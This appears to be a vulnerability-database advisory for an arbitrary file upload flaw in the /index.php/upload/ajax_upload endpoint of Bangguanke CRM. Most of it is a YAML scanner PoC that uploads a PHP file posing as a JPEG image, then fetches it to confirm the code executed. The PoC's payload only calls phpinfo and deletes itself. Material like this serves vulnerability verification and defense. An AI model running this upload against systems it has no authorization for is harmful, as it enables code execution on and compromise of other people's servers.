bangguanke-crm-ajax-upload-fileupload: 帮管客CRM客户管理系统-/index.php/upload/ajax_upload接口存在任意文件上传漏洞

日期: 2025-09-01 | 影响软件: 帮管客CRM客户管理系统 | POC: 已公开

漏洞描述

帮管客CRM客户管理系统-/index.php/upload/ajax_upload接口存在任意文件上传漏洞

PoC代码[已公开]

id: bangguanke-crm-ajax-upload-fileupload

info:
  name: 帮管客CRM客户管理系统-/index.php/upload/ajax_upload接口存在任意文件上传漏洞
  author: water
  severity: critical
  verified: true
  description: |-
    帮管客CRM客户管理系统-/index.php/upload/ajax_upload接口存在任意文件上传漏洞
  tags: bangguanke,fileupload
  created: 2025/06/16

set:
  rboundary: randomLowercase(8)
  randname: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /index.php/upload/ajax_upload
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randname}}.php\"\r\nContent-Type: image/jpeg\r\n\r\n<?php phpinfo();unlink(__FILE__);\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
    expression: |
      response.status == 302 &&
      response.body.bcontains(b'\\u4e0a\\u4f20\\u6210\\u529f')
    output:
      search: '"\"url\":\"(?P<dir>.+?)\"".bsubmatch(response.body)'
      dir: replaceAll(search["dir"],"\\","")

  r1:
    request:
      method: GET
      path: "{{dir}}"
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version')
expression: r0() && r1()

相关漏洞推荐